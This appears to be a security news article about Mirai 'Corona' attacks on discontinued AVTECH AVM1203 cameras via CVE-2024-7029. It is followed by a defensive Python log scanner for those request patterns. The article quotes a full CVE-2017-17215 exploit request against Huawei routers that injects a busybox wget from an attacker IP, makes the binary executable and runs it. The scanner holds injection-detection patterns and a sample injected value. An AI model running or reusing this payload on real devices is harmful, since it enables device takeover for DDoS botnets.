The problem has been known for 5 years, but experts began to sound the alarm only now.
Akamai has detected a new wave of attacks on outdated security cameras from the Taiwanese manufacturer AVTECH. Attackers exploit a critical vulnerability in the AVM1203 model to spread malware from the Mirai family.
The vulnerability, identified as CVE-2024-7029, allows remote execution of arbitrary code on the device. Although the problem has been known for about 5 years, it was officially recognized and registered only this month. Akamai experts have recorded active exploitation of this flaw by attackers since March of this year. To detect the attacks, the researchers deployed a network of honeypots that mimic vulnerable cameras on the Internet.
The Mirai botnet first made a name for itself in 2016, when it was used to carry out a powerful DDoS attack on the website of cybersecurity expert Brian Krebs. In the weeks that followed, it was used to attack ISPs and other targets. One of these attacks on the DNS provider Dyn led to large-scale failures in the operation of many popular web services.
The situation was complicated by the fact that the creators of Mirai published the source code of the malware, which allowed almost anyone to create their own variations for DDoS attacks of unprecedented power. According to Kyle Lefton, a researcher with Akamai's threat response team, they have observed DDoS attacks using infected cameras on "various organizations." At the same time, there is no evidence yet that attackers use cameras to spy or view a video stream.
The exploited vulnerability stems from incorrect processing of the brightness parameter in requests to the /cgi-bin/supervisor/Factory.cgi file, which allows an attacker to inject operating-system commands. The attack downloads a JavaScript file to the device, which then downloads and executes the main payload, a Mirai variant called Corona. After infecting the device, the malware tries to spread further by connecting via Telnet to other hosts. In addition, it exploits a number of other vulnerabilities, including RCE in Hadoop YARN, CVE-2014-8361, and CVE-2017-17215.
Here's an example of code used to exploit the vulnerability in Huawei routers:
Code:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
Since the vulnerable AVM1203 camera model is no longer supported by the manufacturer, experts recommend that users stop using it altogether and replace it with more modern devices. In addition, experts once again remind users of the need to change default credentials on all devices connected to the Internet.
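As an added example (not part of the original article or of Akamai's research), here is a small Python access-log check for the two request patterns the post describes: the brightness parameter of /cgi-bin/supervisor/Factory.cgi carrying shell metacharacters (CVE-2024-7029), and POSTs to the Huawei /ctrlt/DeviceUpgrade_1 endpoint (CVE-2017-17215). The log format, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus
# Endpoints named in the post: the AVTECH CGI hit by CVE-2024-7029 and the
# Huawei HG532 UPnP endpoint hit by CVE-2017-17215.
AVTECH_CGI = "/cgi-bin/supervisor/Factory.cgi"
HUAWEI_UPGRADE = "/ctrlt/DeviceUpgrade_1"
# A brightness value should be a plain number; these characters signal a shell breakout.
SHELL_META = re.compile(r"[;&|`$(){}<>]")
# Combined-log-style line (constructed format): client ip, then the request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

def brightness_values(query):
    # Split on '&' by hand so a ';' inside a value survives (older parse_qs split on it).
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "brightness":
            values.append(unquote_plus(value))
    return values

def classify_request(method, target):
    parts = urlsplit(target)
    if parts.path == AVTECH_CGI:
        if any(SHELL_META.search(v) for v in brightness_values(parts.query)):
            return "avtech-factory-cgi-injection"
        return None
    if parts.path == HUAWEI_UPGRADE and method == "POST":
        # The injected body never reaches an access log, so the POST itself is the signal.
        return "huawei-deviceupgrade-request"
    return None

def scan_log(lines):
    # Collect (client_ip, label) for every line whose request matches a pattern.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            label = classify_request(m["method"], m["target"])
            if label:
                hits.append((m["ip"], label))
    return hits

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2024:09:12:01 +0000] "GET /cgi-bin/supervisor/Factory.cgi?brightness=50 HTTP/1.1" 200 17
203.0.113.9 - - [10/Aug/2024:09:12:03 +0000] "GET /cgi-bin/supervisor/Factory.cgi?brightness=50%3Becho%20x HTTP/1.1" 200 17
198.51.100.4 - - [10/Aug/2024:09:13:44 +0000] "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" 404 0
192.0.2.1 - - [10/Aug/2024:09:14:00 +0000] "GET /index.html HTTP/1.1" 200 1024
""".splitlines()
```

Running scan_log(SAMPLE_LOG) flags only the second and third lines; a numeric brightness value and ordinary page requests pass through untouched.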